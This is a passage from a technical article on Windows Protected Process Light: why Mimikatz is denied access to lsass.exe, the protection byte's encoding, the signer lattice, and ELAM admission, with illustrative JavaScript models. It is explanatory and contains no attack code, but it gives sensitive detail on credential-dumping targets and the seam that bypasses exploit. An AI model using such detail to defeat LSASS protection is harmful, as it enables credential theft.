The denial trace, walked carefully, looks like this. Mimikatz calls OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, lsass_pid). The Win32 thunk lands on NtOpenProcess, which dispatches to the object-manager callback PspProcessOpen. That callback calls PspCheckForInvalidAccessByProtection, which calls RtlTestProtectedAccess against the caller's EPROCESS.Protection byte and the target's EPROCESS.Protection byte. The lattice test fails. The kernel strips PROCESS_VM_READ from the requested mask. With the surviving limited mask, the request continues into SeAccessCheck, but Mimikatz never wanted the limited mask; it wanted to read memory. The handle returned (or the failure path taken) gives Mimikatz exactly the path that produces 0x00000005 in kuhl_m_sekurlsa.c. (The relevant commit is fe4e98405589e96ed6de5e05ce3c872f8108c0a0, which itm4n cites as the source of the exact failure path that yields 0x00000005 [@mimikatz-sekurlsa].)

sequenceDiagram
participant Mim as Mimikatz (SYSTEM, SeDebugPrivilege)
participant K32 as kernel32 / OpenProcess
participant NtOP as NtOpenProcess
participant PsPO as PspProcessOpen
participant CHK as PspCheckForInvalidAccessByProtection
participant Lat as RtlTestProtectedAccess
participant SAC as SeAccessCheck

Mim->>K32: OpenProcess(PROCESS_VM_READ, lsass)
K32->>NtOP: syscall NtOpenProcess
NtOP->>PsPO: object-manager callback
PsPO->>CHK: check caller.Protection vs target.Protection
CHK->>Lat: lattice rule (signer rungs)
Lat-->>CHK: full mask denied
CHK-->>PsPO: strip PROCESS_VM_READ
PsPO->>SAC: residual mask (limited only)
SAC-->>NtOP: limited handle (read denied)
NtOP-->>Mim: STATUS_ACCESS_DENIED (NTSTATUS 0xC0000022, Win32 GetLastError = 5)
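The ordering in the trace is the whole point: the protection gate runs before privileges or the DACL are consulted. The sketch below is a hypothetical model, not kernel code. `openProcessModel`, the `dominatesTarget` flag, and the `daclGrants` field are invented for illustration; the deny mask is the 0xFC7FF value this article attributes to the Lsa row of RtlProtectedAccess[]; and the model assumes the open fails outright when any requested bit falls in that mask, which matches the 0x5 Mimikatz reports.

```javascript
// Hypothetical model of the denial trace's check order; not kernel code.
const PROCESS_VM_READ = 0x0010;
const PROCESS_QUERY_INFORMATION = 0x0400;
const PROCESS_QUERY_LIMITED_INFORMATION = 0x1000;

const STATUS_SUCCESS = 0x00000000;
const STATUS_ACCESS_DENIED = 0xC0000022;

// Deny mask the article gives for a target at the Lsa rung.
const LSA_TARGET_DENY_MASK = 0x000FC7FF;

function openProcessModel(caller, desiredAccess) {
  // Gate 1: the protection lattice. Tokens and privileges play no part here.
  if (!caller.dominatesTarget && (desiredAccess & LSA_TARGET_DENY_MASK) !== 0) {
    return { status: STATUS_ACCESS_DENIED, deniedAt: 'protection' };
  }
  // Gate 2: the security descriptor. SeDebugPrivilege bypasses the DACL for process objects.
  const granted = caller.privileges.includes('SeDebugPrivilege') ? ~0 : caller.daclGrants;
  if ((desiredAccess & ~granted) !== 0) {
    return { status: STATUS_ACCESS_DENIED, deniedAt: 'security-descriptor' };
  }
  return { status: STATUS_SUCCESS, deniedAt: null };
}

// An unprotected SYSTEM caller holding SeDebugPrivilege, as in Section 1.
const mimikatz = { dominatesTarget: false, privileges: ['SeDebugPrivilege'], daclGrants: 0 };
console.log(openProcessModel(mimikatz, PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).deniedAt); // protection
console.log(openProcessModel(mimikatz, PROCESS_QUERY_LIMITED_INFORMATION).status); // 0
```

The same caller that is refused memory access gets a limited-information handle, because that bit never reaches the lattice's deny mask.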

Note: If every privilege Windows defines is held by the caller, what is doing the denying? The answer is a kernel structure that the token model does not see and the security descriptor does not influence -- a byte in EPROCESS named Protection, mediating a lattice the access check consults before it ever asks SeAccessCheck about privileges.

This is not a workaround pattern. It is a new dimension. The token model is unchanged. The integrity level is unchanged. The security descriptor on lsass.exe is unchanged. What changed is that the kernel now answers a question it did not ask before: what kind of trust does the caller have to manipulate the address space of the callee?

PPL re-asks the question of who can touch whom one level below the token model.

That mechanism has a name (Protected Process Light), an encoding (a single UCHAR), and a history that does not begin where you would expect. To understand the byte, we have to understand why Microsoft built it in the first place. The next section starts where the history starts: a 2006 Microsoft whitepaper about Hollywood.

2. Historical Origins -- Vista, DRM, and the First Protected Process

The kernel mechanism that today denies admins access to LSASS was invented in 2006 to keep Hollywood happy. The cover page of Microsoft's process_vista.doc whitepaper opens with a sentence almost no one quotes today:

The Microsoft Windows Vista operating system introduces a new type of process known as a protected process to enhance support for Digital Rights Management functionality in Windows Vista.

The whitepaper was published November 27, 2006, two months before Vista's GA, and it is the architectural seed of the byte we will be staring at for the rest of this article [@vista-process-doc]. The motivation was not credential theft. It was HD-DVD and Blu-ray content protection. Studio licensing agreements required that even an administrator on the local machine could not read the audio device graph isolation host's memory while protected content was playing. The Protected Media Path required a kernel-enforced barrier between admin user-mode and the media pipeline.

Protected Media Path (PMP): The Vista-era set of components that decrypt and render high-definition video and audio content under DRM. PMP requires kernel-enforced isolation of `audiodg.exe` and a small set of related processes so that local administrators cannot dump intermediate content keys from process memory.

The Vista design was minimal. A single bit in EPROCESS marks a process as protected. At NtCreateUserProcess, the kernel parses the main image's Authenticode signature and looks for a specific Microsoft EKU OID that only the PMP signing root can issue [@forshaw-2018-10]. If the EKU is present and the chain resolves to that root, the kernel flips the bit. On every subsequent NtOpenProcess against that process, the kernel strips a fixed set of access rights from the mask, no matter who is asking.

Alex Ionescu, then a Windows internals researcher and now CrowdStrike's Chief Technology Innovation Officer, enumerated the denials in 2007 [@ionescu-pp-bad-idea]:

A typical process cannot perform operations such as the following on a protected process: Inject a thread into a protected process; Access the virtual memory of a protected process; Debug an active protected process; Duplicate a handle from a protected process; Change the quota or working set of a protected process.

Five denials. One bit. One certificate root. Ionescu's same essay, titled "Why Protected Processes Are A Bad Idea," made a structural argument that aged well: putting a DRM mechanism in the kernel is a category error. The mechanism is too narrow for non-DRM use because the only certificate accepted is Microsoft's PMP signing root, and the only operations gated are the ones Hollywood cared about. Third parties cannot opt in, and Microsoft itself cannot graduate the level of trust. (Ionescu's 2007 critique remains worth reading on its own merits. The argument that DRM-shaped kernel features tend to be reused for security mitigations, and that this reuse changes their threat-model semantics, is exactly what plays out over the next seven years [@ionescu-pp-bad-idea].)

The seven-year pause is its own story. Vista shipped, Vista was followed by Windows 7, and Windows 7 was followed by Windows 8 -- and through all of it, the access-check primitive that protects audiodg.exe from administrators remained a DRM artefact. The primitive existed; the graduated trust dimension did not. Two parallel failures pushed Microsoft toward widening the encoding.

The first was Mimikatz. Benjamin Delpy's tool was first released in May 2011 and refined through 2013 [@mimikatz-wikipedia]; it made it trivial for an administrator to extract NTLM hashes and Kerberos session keys from lsass.exe. The countermeasure of restricting SeDebugPrivilege was useless; an attacker who has SYSTEM has every privilege. What Mimikatz exploited was a primitive gap: the kernel had no way to say "lsass is protected against administrators but reachable from privileged Microsoft services."

The second was Mateusz Jurczyk's CSRSS jailbreak of Windows 8 RT in 2013. Jurczyk (who writes as j00ru) catalogued more than seventy Win32k system calls that the kernel guarded with the pattern if (PsGetCurrentProcess() != gpepCsrss) return STATUS_ACCESS_DENIED; [@j00ru-1393]. That gating mechanism worked only as long as nobody could inject code into csrss.exe. On Windows 8 RT, an attacker who could inject into csrss.exe could bypass Microsoft's locked-down Surface RT shell. Ionescu later observed that "In Windows 8.1 RT, this jailbreak is 'fixed', by virtue that code can no longer be injected into Csrss.exe for the attack" [@ionescu-part2]. The fix made csrss.exe a PPL at the WinTcb rung, and the same machinery was generalised to lsass.exe and the Antimalware tier.

Note: Mimikatz proved Microsoft needed a graduated trust dimension for lsass.exe. The j00ru CSRSS jailbreak proved Microsoft needed it for csrss.exe too. The same widening of the encoding answered both.

flowchart LR
subgraph Vista2006[Vista 2006 -- single bit]
V1[EPROCESS protected = 0 or 1]
V2[Certificate root: PMP only]
V3[Access denials: hardcoded 5-tuple]
end
subgraph Win81[Windows 8.1 -- _PS_PROTECTION byte]
W1[Type: 3 bits]
W2[Audit: 1 bit]
W3[Signer rung: 4 bits]
W4[Certificate roots: per-EKU sub-OIDs]
W5[Access denials: lattice over signer]
end
V1 --> W1
V2 --> W4
V3 --> W5

The DRM-to-credentials repurposing is not unique to PPL. The same pattern shows up in HVCI (originally a Hyper-V kernel-mode integrity feature, later repurposed for general code-integrity enforcement) and in Trustlets (originally an enterprise feature for Credential Guard, later generalised). Kernel mechanisms born in one threat model rarely stay confined to it.

Microsoft already had the access-check primitive. What it didn't have, in 2007, was a way to ask "how much trust does this process carry?" The fix would not arrive until Windows 8.1 in October 2013, and when it arrived, it would fit in a single byte.

3. `_PS_PROTECTION` -- The Single-Byte Encoding

The 8.1 fix is so compact it fits in a single byte. Ionescu's Part 1 of the "Evolution of Protected Processes" series, published November 22, 2013, gives the kernel structure verbatim [@ionescu-part1]:

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Three fields. One byte. The union with the UCHAR Level member exists so that two _PS_PROTECTION values can be compared with a single byte load and a single byte compare. The kernel does this on every NtOpenProcess. Speed matters; this is the hot path of the security model.

`_PS_PROTECTION`: The kernel structure that encodes a process's protection state in eight bits: three bits of Type (`None`, `ProtectedLight`, `Protected`), one bit of Audit (intended as a forensic side-channel hint, although the exact runtime semantics are not enumerated in the public sources cited here), and four bits of Signer rung. Stored as `EPROCESS.Protection`.

The Type field has three values. PsProtectedTypeNone = 0 marks a regular process. PsProtectedTypeProtectedLight = 1 marks a PPL -- the graduated path introduced in 8.1. PsProtectedTypeProtected = 2 marks a "heavy" Vista-style PP. Heavy PPs still exist; they retain the original DRM semantics where almost nothing from below the protection level may touch them. PPLs are the new general-purpose path where the signer rung mediates a graduated lattice.

The Audit bit is the least documented of the three fields. Ionescu Part 1 lists it as Audit : Pos 3, 1 Bit with no semantic gloss; itm4n's RunAsPPL header annotates it as // Reserved; Microsoft Learn enumerates CodeIntegrity events 3033, 3063, 3065, and 3066, but those are triggered by the AuditLevel configuration under Image File Execution Options\LSASS.exe and concern DLL-load failures, not per-process OpenProcess denials [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field's name implies a forensic side-channel, and the bit-position is reserved; the precise runtime emission shape is not enumerated in the public sources cited here.

The Signer field is the structurally interesting one. Ionescu's 2013 enumeration names eight values [@ionescu-part1]:

Signer constant	Value	Used for
`PsProtectedSignerNone`	0	Non-protected (no rung)
`PsProtectedSignerAuthenticode`	1	Generic third-party Authenticode (early PPL guests)
`PsProtectedSignerCodeGen`	2	.NET native runtime code generators
`PsProtectedSignerAntimalware`	3	EDR / AV daemons admitted via ELAM
`PsProtectedSignerLsa`	4	`lsass.exe` under `RunAsPPL`
`PsProtectedSignerWindows`	5	Microsoft Windows components below TCB
`PsProtectedSignerWinTcb`	6	`csrss.exe`, `smss.exe`, `services.exe` -- the inbox TCB
`PsProtectedSignerMax`	7	Sentinel value (enumeration upper bound)

Note: Ionescu's 2013 list is the authoritative baseline enumeration. It is not a permanent enumeration. By 2018, James Forshaw's PowerShell tooling (NtApiDotNet) was enumerating an additional App = 8 signer used for AppContainer / TruePlay scenarios [@forshaw-2018-10]. Newer builds of Windows extend the enumeration further. The article will name WinTcb (Microsoft's documented inbox-TCB rung) and Antimalware (the only non-Microsoft-admissible rung) repeatedly, because they are the load-bearing ones. The intermediate values evolve.

Adjacent to EPROCESS.Protection are two related fields, EPROCESS.SignatureLevel and EPROCESS.SectionSignatureLevel, which Ionescu introduces in Part 3 [@ionescu-part3]. These fields encode the binary integrity the kernel demands at process creation and at every subsequent section load, and they are filled in from a 16-entry Signing Level table that runs from Unchecked = 0 up to Windows TCB = 14. The Signer rung in Protection answers "what kind of trust does this process hold?" The SignatureLevel pair answers "what binaries is this process allowed to map?" They are not the same question.

Now the worked decode. Given the byte value 0x41, the encoding falls out by hand:

Low three bits (Type): 0x41 & 0x07 = 0x01 -- PsProtectedTypeProtectedLight.
Bit 3 (Audit): (0x41 >> 3) & 0x01 = 0 -- Audit off.
High four bits (Signer): (0x41 >> 4) & 0x0F = 0x04 -- PsProtectedSignerLsa.

A process with EPROCESS.Protection = 0x41 is a PPL signed at the Lsa rung. That is exactly what lsass.exe looks like on a host with RunAsPPL = 1. Ionescu's blog explicitly states: "it's easy to read 0x41 as Lsa (0x4) + PPL (0x1)" [@ionescu-part1]. The Defender service MsMpEng.exe, signed at the Antimalware rung, has Protection = 0x31. The Client/Server Runtime Subsystem process csrss.exe, signed at WinTcb, has Protection = 0x61.

flowchart TD
B[byte: 8 bits]
B --> F1[bits 0..2: Type]
B --> F2[bit 3: Audit]
B --> F3[bits 4..7: Signer]
F1 --> T0[0 = None]
F1 --> T1[1 = ProtectedLight PPL]
F1 --> T2[2 = Protected PP]
F3 --> S0[0 None]
F3 --> S1[1 Authenticode]
F3 --> S2[2 CodeGen]
F3 --> S3[3 Antimalware]
F3 --> S4[4 Lsa]
F3 --> S5[5 Windows]
F3 --> S6[6 WinTcb]

function decodeProtection(byteValue) {
  // Split the single _PS_PROTECTION byte into its three bitfields.
  const type = byteValue & 0x07;          // bits 0..2
  const audit = (byteValue >> 3) & 0x01;  // bit 3
  const signer = (byteValue >> 4) & 0x0F; // bits 4..7
  const typeNames = ['None', 'ProtectedLight', 'Protected'];
  const signerNames = [
    'None', 'Authenticode', 'CodeGen', 'Antimalware',
    'Lsa', 'Windows', 'WinTcb', 'Max'
  ];
  return {
    raw: '0x' + byteValue.toString(16).padStart(2, '0'),
    // Values outside the 2013 baseline enumeration are reported as unknown.
    type: typeNames[type] || 'unknown(' + type + ')',
    audit: audit ? 'on' : 'off',
    signer: signerNames[signer] || 'unknown(' + signer + ')'
  };
}

// Worked examples from real Windows processes
console.log('MsMpEng.exe (Defender):', decodeProtection(0x31));
console.log('lsass.exe under RunAsPPL:', decodeProtection(0x41));
console.log('csrss.exe (WinTcb):', decodeProtection(0x61));
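Going the other way is just as mechanical. A small sketch that packs the three fields back into the Level byte, assuming the bit positions used by `decodeProtection` (Type in the low bits, Signer in the high nibble); `encodeProtection` is a helper name introduced here, not a Windows API. Because the result is one integer, comparing two whole protection states is a single compare, which is what the union buys the kernel.

```javascript
// Pack Type (bits 0..2), Audit (bit 3), and Signer (bits 4..7) into one byte.
function encodeProtection(type, audit, signer) {
  if (type < 0 || type > 0x7) throw new RangeError('Type is a 3-bit field');
  if (audit !== 0 && audit !== 1) throw new RangeError('Audit is a 1-bit field');
  if (signer < 0 || signer > 0xF) throw new RangeError('Signer is a 4-bit field');
  return (signer << 4) | (audit << 3) | type;
}

// Constant values as listed in the signer table in this section.
const PsProtectedTypeProtectedLight = 1;
const PsProtectedSignerAntimalware = 3;
const PsProtectedSignerLsa = 4;
const PsProtectedSignerWinTcb = 6;

const levels = {
  'MsMpEng.exe': encodeProtection(PsProtectedTypeProtectedLight, 0, PsProtectedSignerAntimalware),
  'lsass.exe (RunAsPPL)': encodeProtection(PsProtectedTypeProtectedLight, 0, PsProtectedSignerLsa),
  'csrss.exe': encodeProtection(PsProtectedTypeProtectedLight, 0, PsProtectedSignerWinTcb),
};
for (const [name, level] of Object.entries(levels)) {
  console.log(name, '0x' + level.toString(16)); // 0x31, 0x41, 0x61 in turn
}
```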

Note: One byte, three fields, eight signer rungs. The kernel reads it on every OpenProcess, before any token check, before any ACL evaluation. The encoding is the entire vocabulary the kernel has for asking how trusted a process is.

The encoding tells the kernel what kind of trust a process holds. It says nothing about who can touch whom across rungs. That rule -- the lattice -- is the structure imposed on top of the bytes. The next section is the lattice.

4. The Signer Lattice -- Who Can Open Whom

itm4n's 2021 walkthrough states the three rules verbatim, and they have the rare quality of being short enough to memorise [@itm4n-scrt]:

A PP can open a PP or a PPL with full access if its signer type is greater or equal. A PPL can open a PPL with full access if its signer type is greater or equal. A PPL cannot open a PP with full access, regardless of its signer type.

Three rules. They settle every cross-process access question PPL gates. Let us name them and then read off their consequences.

Rule 1. A PP at signer $S_c$ may open with full access a PP or PPL at signer $S_t$ if and only if $S_c \ge S_t$.

Rule 2. A PPL at signer $S_c$ may open with full access a PPL at signer $S_t$ if and only if $S_c \ge S_t$.

Rule 3. A PPL cannot open a PP with full access, regardless of signer.

The qualifier "with full access" is load-bearing. PPL's lattice gates the full mask -- PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_ALL_ACCESS. A separate limited mask (SYNCHRONIZE, PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_SUSPEND_RESUME, and -- when the target sits at the Authenticode, CodeGen, or Windows rung -- PROCESS_TERMINATE) is allowed when the security descriptor permits. The target's rung matters. Ionescu's verbatim RtlProtectedAccess[] table widens the deny mask from 0xFC7FE to 0xFC7FF at the Antimalware, Lsa, and WinTcb rungs -- one extra bit, bit 0, which is PROCESS_TERMINATE [@ionescu-part2]. So an administrator can still call OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, ...) against a protected lsass.exe to query basic information such as its image path, but cannot terminate a PPL/Antimalware, PPL/Lsa, or PPL/WinTcb daemon via a direct kill. The lattice does not lock the process; it locks the interesting access, and for those three rungs it also locks the kill.
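The mask arithmetic can be checked directly. A sketch assuming the public Win32 access-right constants and the two deny masks quoted above: 0xFC7FE for targets at Authenticode, CodeGen, and Windows, and 0xFC7FF for Antimalware, Lsa, and WinTcb. `survivingAccess` and `names` are illustrative helpers; the model covers only a caller that does not dominate the target and leaves out the security-descriptor check that follows.

```javascript
// Public Win32 process access-right values.
const ACCESS = {
  PROCESS_TERMINATE: 0x0001,
  PROCESS_CREATE_THREAD: 0x0002,
  PROCESS_VM_READ: 0x0010,
  PROCESS_VM_WRITE: 0x0020,
  PROCESS_DUP_HANDLE: 0x0040,
  PROCESS_SUSPEND_RESUME: 0x0800,
  PROCESS_QUERY_LIMITED_INFORMATION: 0x1000,
  PROCESS_SET_LIMITED_INFORMATION: 0x2000,
  SYNCHRONIZE: 0x00100000,
};

// Deny masks per target signer, as quoted from the RtlProtectedAccess[] discussion.
const DENY_MASK_BY_TARGET_SIGNER = {
  Authenticode: 0x000FC7FE,
  CodeGen: 0x000FC7FE,
  Antimalware: 0x000FC7FF,
  Lsa: 0x000FC7FF,
  Windows: 0x000FC7FE,
  WinTcb: 0x000FC7FF,
};

// Access bits that survive when the caller does NOT dominate the target.
function survivingAccess(targetSigner, requested) {
  const deny = DENY_MASK_BY_TARGET_SIGNER[targetSigner];
  if (deny === undefined) throw new Error('unknown signer ' + targetSigner);
  return requested & ~deny;
}

// Names of the set bits, for readable output.
function names(mask) {
  return Object.keys(ACCESS).filter((k) => (mask & ACCESS[k]) !== 0);
}

const ask = ACCESS.PROCESS_VM_READ | ACCESS.PROCESS_TERMINATE | ACCESS.PROCESS_QUERY_LIMITED_INFORMATION;
console.log(names(survivingAccess('Windows', ask)).join(', ')); // PROCESS_TERMINATE, PROCESS_QUERY_LIMITED_INFORMATION
console.log(names(survivingAccess('Lsa', ask)).join(', '));     // PROCESS_QUERY_LIMITED_INFORMATION
console.log((0x000FC7FF ^ 0x000FC7FE) === ACCESS.PROCESS_TERMINATE); // true
```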

Caller signer \ Target signer	None	Authenticode (1)	Antimalware (3)	Lsa (4)	Windows (5)	WinTcb (6)
None (admin, integrity SYSTEM)	full	denied	denied	denied	denied	denied
PPL/Authenticode (1)	full	full	denied	denied	denied	denied
PPL/Antimalware (3)	full	full	full	denied	denied	denied
PPL/Lsa (4)	full	full	full	full	denied	denied
PPL/Windows (5)	full	full	full	full	full	denied
PPL/WinTcb (6)	full	full	full	full	full	full

Where "denied" means the full mask is rejected; the limited mask continues to apply per the target's security descriptor.
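Because the three rules form a complete decision procedure, the table can be regenerated from them. A sketch, assuming Type values 0/1/2 for None/PPL/PP and the signer values from the enumeration table; `canOpenFull` is a name invented here, and the kernel itself applies the RtlProtectedAccess[] data table rather than this predicate.

```javascript
// The three lattice rules as a predicate. Types: 0 None, 1 PPL, 2 PP.
const TYPE = { None: 0, PPL: 1, PP: 2 };

function canOpenFull(caller, target) {
  if (target.type === TYPE.None) return true;   // unprotected target: lattice does not apply
  if (caller.type === TYPE.None) return false;  // unprotected caller, protected target
  if (caller.type === TYPE.PP) return caller.signer >= target.signer;   // Rule 1
  if (target.type === TYPE.PPL) return caller.signer >= target.signer;  // Rule 2
  return false;                                 // Rule 3: a PPL never fully opens a PP
}

const SIGNERS = [['Authenticode', 1], ['Antimalware', 3], ['Lsa', 4], ['Windows', 5], ['WinTcb', 6]];
const rows = [['None', { type: TYPE.None, signer: 0 }]]
  .concat(SIGNERS.map(([n, s]) => ['PPL/' + n, { type: TYPE.PPL, signer: s }]));
const cols = [['None', { type: TYPE.None, signer: 0 }]]
  .concat(SIGNERS.map(([n, s]) => [n, { type: TYPE.PPL, signer: s }]));

// Prints the same full/denied matrix as the table above, one caller row per line.
for (const [rowName, caller] of rows) {
  const cells = cols.map(([, target]) => (canOpenFull(caller, target) ? 'full' : 'denied'));
  console.log(rowName.padEnd(18), cells.join('\t'));
}
```

The diagonal comes out "full" for every rung, which is the within-rung peer access the lattice permits by design.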

flowchart BT
None[None / unprotected]
Auth[Authenticode]
CG[CodeGen]
AM[Antimalware]
Lsa[Lsa]
Win[Windows]
Tcb[WinTcb]
None --> Auth
Auth --> CG
CG --> AM
AM --> Lsa
Lsa --> Win
Win --> Tcb

The Enhanced Key Usage side of the design holds the lattice together. Microsoft's EKU OID arc 1.3.6.1.4.1.311.10.3.* defines sub-OIDs per signer rung [@iana-pen311] [@oid-base-eku-arc], and at process creation the kernel parses the main image's Authenticode signature and walks its EKU extensions to determine which rung the binary is entitled to claim. If the certificate chain resolves cleanly to a Microsoft-issued root and carries the rung's sub-OID, the kernel records the rung. Otherwise the process either starts unprotected or refuses to start at all.

Enhanced Key Usage (EKU): An X.509 v3 certificate extension that asserts the specific purposes for which a certificate's key may be used. Microsoft uses sub-OIDs under `1.3.6.1.4.1.311.10.3.*` to encode protected-process signer rungs as EKU values [@iana-pen311] [@oid-base-eku-arc]. The kernel checks the EKU at process creation; the certificate chain anchors which Microsoft-issued sub-CA may issue at each rung. (The IANA Private Enterprise Number `311` is registered to Microsoft under the PEN prefix `1.3.6.1.4.1.` [@iana-pen311], so `1.3.6.1.4.1.311.*` is the catch-all namespace for Microsoft-specific X.509 extensions; the `10.3.*` arc within it is the Microsoft Enhanced Key Usage (purpose) sub-tree [@oid-base-eku-arc], and slots under `10.3.*` map to specific signer purposes, including protected-process rungs.)
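Arc membership is a component-wise prefix test, not a string prefix. A sketch with `parseOid` and `isUnderArc` introduced for illustration; the only real OIDs used are the Microsoft PEN arc, the EKU arc named here, and the Early Launch EKU 1.3.6.1.4.1.311.61.4.1 that Microsoft's ELAM sample documents. The `3110` OID is made up to show why a plain string comparison would be wrong.

```javascript
// Parse a dotted OID into integer arcs, rejecting malformed input.
function parseOid(oid) {
  const arcs = oid.split('.');
  if (arcs.length < 2 || arcs.some((a) => !/^(0|[1-9]\d*)$/.test(a))) {
    throw new Error('malformed OID: ' + oid);
  }
  return arcs.map(Number);
}

// True when `oid` sits strictly underneath `arc`, compared arc by arc.
// A string startsWith() test would wrongly accept 1.3.6.1.4.1.3110.* under 1.3.6.1.4.1.311.
function isUnderArc(oid, arc) {
  const o = parseOid(oid);
  const a = parseOid(arc);
  return o.length > a.length && a.every((v, i) => o[i] === v);
}

const MICROSOFT_PEN = '1.3.6.1.4.1.311';
const MICROSOFT_EKU_ARC = '1.3.6.1.4.1.311.10.3';
const ELAM_EKU = '1.3.6.1.4.1.311.61.4.1';

console.log(isUnderArc(ELAM_EKU, MICROSOFT_PEN));                   // true
console.log(isUnderArc(ELAM_EKU, MICROSOFT_EKU_ARC));               // false: 61.4 is a different sub-arc
console.log(isUnderArc('1.3.6.1.4.1.3110.10.3.1', MICROSOFT_PEN));  // false (hypothetical OID)
```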

The most important property of this design is the resolution point. The kernel parses the EKU exactly once, at NtCreateUserProcess. It stores the resulting rung in EPROCESS.Protection. On every subsequent OpenProcess against that process, the kernel consults the byte, not the certificate. This makes the access check fast (one byte load, one byte compare) and decouples policy at runtime from policy at signing time. It also creates the structural seam that every public bypass since 2018 has exploited, because the kernel's confidence in the byte is exactly the confidence it had in the certificate at process-create time, projected forward indefinitely.
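The resolve-once property can be stated as a tiny model. Everything here is hypothetical: `ProcessModel`, `signatureValid`, and `claimedLevel` stand in for NtCreateUserProcess's signature parse and the EPROCESS.Protection write. The sketch shows only that later checks read the cached byte, so any change to the signing picture after launch is invisible to them.

```javascript
// Hypothetical model: the signer rung is resolved once, at creation, and cached.
class ProcessModel {
  constructor(image) {
    // NtCreateUserProcess analogue: the only place the signature is examined.
    this.protection = image.signatureValid ? image.claimedLevel : 0x00;
  }
}

// OpenProcess analogue: reads the cached byte and never re-examines the image.
function readProtection(proc) {
  return proc.protection;
}

const image = { signatureValid: true, claimedLevel: 0x31 };
const daemon = new ProcessModel(image);
image.signatureValid = false; // the trust picture changes after launch...
console.log('0x' + readProtection(daemon).toString(16)); // 0x31: ...but the cached byte does not
```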

Ionescu's Part 2 names the implementation directly. The lattice is not code; it is a data table named RtlProtectedAccess[] baked into ntoskrnl.exe [@ionescu-part2]. Each row of that table corresponds to a (signer, target-type) pair and encodes which access bits are allowed in the full mask. The relevant runtime routines are PspProcessOpen and PspThreadOpen (the object-manager open callbacks), PspCheckForInvalidAccessByProtection (which performs the check), RtlTestProtectedAccess (which applies the lattice row), and RtlValidProtectionLevel (which sanity-checks the encoded byte for consistency).

Note: The decision of who can touch whom is encoded in a table inside ntoskrnl.exe. Changing the lattice means changing a table; widening or narrowing it does not require new code. This is why Microsoft can add App = 8 to the enumeration over time without touching the access-check routine.

Note one symmetry that becomes important later. "Greater or equal" means that within a rung, every PPL can read every other PPL. Two co-resident PPL/Antimalware daemons -- Microsoft Defender's MsMpEng.exe and a third-party EDR's agent -- can call PROCESS_VM_READ on each other. Within-rung peers leak to each other by design. The lattice prevents escalation, not peer access.

The lattice settles the rule. The next question is admission: who decides which binaries are allowed to claim the Antimalware rung, and how does Microsoft admit third-party code into it at all? The answer is a driver.

5. The Antimalware Rung -- ELAM and Third-Party Code at PPL

PPL is interesting only if it admits non-Microsoft code at some rung. The Vista PP design admitted nobody; it required a Microsoft PMP root certificate, full stop. PPL inherited that constraint at every rung except one. The Antimalware rung -- signer value 3 -- is the only rung where third-party vendors can ship their own user-mode binaries as protected processes. The admission mechanism is the Early Launch Anti-Malware driver.

Early Launch Anti-Malware (ELAM) driver: A specially signed Microsoft-certified kernel driver shipped by an anti-malware vendor that loads before any other boot-start driver. The ELAM driver participates in trusted-boot measurement, vouches for follow-on drivers, and -- critical to PPL -- carries an embedded resource section enumerating the vendor's user-mode signing certificate hashes. The kernel uses that resource section to admit the vendor's user-mode daemon binaries to `PPL/Antimalware` at service start.

Microsoft Learn's "Protecting Anti-Malware Services" page describes the boot-time admission flow in two sentences [@learn-am-services]:

The driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries. During the boot process, this resource section will be extracted from the ELAM driver to validate the certificate information and register the anti-malware service.

Two consequences. First, the third-party signer set is bounded by a kernel-readable resource section, not by an open EKU. Microsoft, not the vendor, controls which user-mode binaries are admissible. Second, the certificate hashes are baked into the driver at signing time and re-validated at every service start. A vendor cannot widen the admissible set after the fact; an attacker cannot drop in their own user-mode binary unless its hash is already listed.

The gate that decides which vendors get ELAM drivers in the first place is the Microsoft Virus Initiative. Microsoft Learn's MVI criteria page enumerates the requirement explicitly [@learn-mvi]:

Your security solution must be certified within the last 12 months by at least one of the organizations listed below: AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, West Coast Labs.

The same page requires "use of Trusted Signing," Microsoft's cloud-managed code signing service. The implications are operational. To ship code at PPL/Antimalware, a vendor must (a) hold MVI membership, (b) maintain independent-lab certification, (c) author an ELAM driver, (d) get the driver through Microsoft WHQL and have it Microsoft co-signed, and (e) embed the user-mode certificate hashes in the driver's resource section.

Microsoft Virus Initiative (MVI): A Microsoft program for anti-malware vendors that gates access to ELAM driver signing and to specific Defender APIs. Membership requires independent-lab certification (renewed annually) and Trusted Signing usage; in practical terms, MVI membership is the entry ticket to deploying user-mode binaries at `PPL/Antimalware`.

The implication of MVI is that an indie security tool, however technically sound, cannot deploy as `PPL/Antimalware`. The gate is not technical but commercial: independent-lab certification fees, annual renewals, and the engineering investment of building a production-grade ELAM driver. The signer rung is *signed*; the signing program is *gated*.

sequenceDiagram
participant BM as Boot manager
participant K as Windows kernel
participant ELAM as Vendor ELAM driver (.sys)
participant SCM as Service Control Manager
participant CI as ci.dll (CodeIntegrity)
participant Svc as Vendor service (e.g. EDR daemon)
BM->>K: load boot drivers
K->>ELAM: load ELAM driver early
K->>ELAM: read embedded ELAM resource section
K->>K: cache vendor user-mode cert hashes
Note over K,SCM: Boot continues, OS initialises
SCM->>Svc: start vendor service
Svc->>CI: validate service binary signature
CI->>K: lookup vendor cert against cached hashes
K-->>CI: match -- admit at PPL/Antimalware
CI-->>Svc: launch as PPL/Antimalware (Protection = 0x31)
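The admission flow in the diagram reduces to an allowlist lookup keyed on certificate hashes. A hypothetical sketch: the hash strings are placeholders, `cacheElamResource` and `admitService` are invented names, and the real resource-section format and hash algorithm are defined by Microsoft's ELAM documentation and sample, not by this code. Returning 0x00 for an unlisted binary is a simplification of "not admitted at PPL/Antimalware".

```javascript
// Hypothetical model of ELAM-based admission; placeholder hashes, not a real format.
const PPL_ANTIMALWARE = 0x31; // Type = ProtectedLight (1), Signer = Antimalware (3)

// Boot time: cache the certificate hashes extracted from the ELAM resource section.
function cacheElamResource(resourceCertHashes) {
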